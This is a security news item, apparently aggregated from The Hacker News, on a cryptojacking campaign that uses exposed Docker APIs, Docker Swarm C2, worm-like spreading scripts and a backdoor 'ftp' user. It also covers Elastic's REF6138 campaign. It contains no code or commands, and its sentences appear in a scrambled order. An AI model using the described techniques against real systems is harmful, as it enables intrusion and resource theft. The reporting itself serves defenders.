On vulnerable endpoints, the Docker API is used to spawn an Alpine container and then retrieve an initialization shell script (init.sh) from a remote server ("solscan[.]live") that, in turn, checks if it's running as the root user and tools like curl and wget are installed before downloading the XMRig miner. The attacks leverage Docker for initial access to deploy a cryptocurrency miner on compromised containers, while also fetching and executing additional payloads that are responsible for conducting lateral movement to related hosts running Docker, Kubernetes, or SSH. The shell script is also designed to fetch three other shell scripts – kube.lateral.sh, spread_docker_local.sh, and spread_ssh.sh – from the same server for lateral movement to Docker, Kubernetes, and SSH endpoints on the network. Cybersecurity researchers have uncovered a new cryptojacking campaign targeting the Docker Engine API with the goal of co-opting the instances to join a malicious Docker Swarm controlled by the threat actor. What's more, the Docker image tag that's used to retrieve the image from Docker Hub is specified in a text file hosted on the C2 server, thereby allowing the threat actors to easily recover from potential takedowns by simply changing the file contents to point to a different container image. The upspin image is designed to execute the aforementioned init.sh script, thus allowing the group's malware to propagate in a worm-like fashion to other Docker hosts. "This campaign demonstrates that services such as Docker and Kubernetes remain fruitful for threat actors conducting cryptojacking at scale," Datadog said. The development comes as Elastic Security Labs shed light on a sophisticated Linux malware campaign targeting vulnerable Apache servers to establish persistence via GSocket and deploy malware families such as Kaiji and RUDEDEVIL (aka Lucifer) that facilitate distributed denial-of-service (DDoS) and cryptocurrency mining, respectively. "This allows the threat actor to expand their control over multiple Docker instances in a coordinated fashion, effectively turning compromised systems into a botnet for further exploitation," the researchers said. "The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels," researchers Remco Sprooten and Ruben Groenewoud said. The third shell script, spread_ssh.sh, is capable of compromising SSH servers, as well as adding an SSH key and a new user named ftp that enables the threat actors to remotely connect to the hosts and maintain persistent access. This enabled the attackers to "use Docker Swarm's orchestration features for command-and-control (C2) purposes," Datadog researchers Matt Muir and Andy Giron said in an analysis. In the final stage, both the Kubernetes and SSH lateral movement payloads execute another shell script called setup_mr.sh that retrieves and launches the cryptocurrency miner. Specifically, this involves identifying unauthenticated and exposed Docker API endpoints using Internet scanning tools, such as masscan and ZGrab.
This Cyber News was published on thehackernews.com. Publication date: Tue, 01 Oct 2024 05:43:37 +0000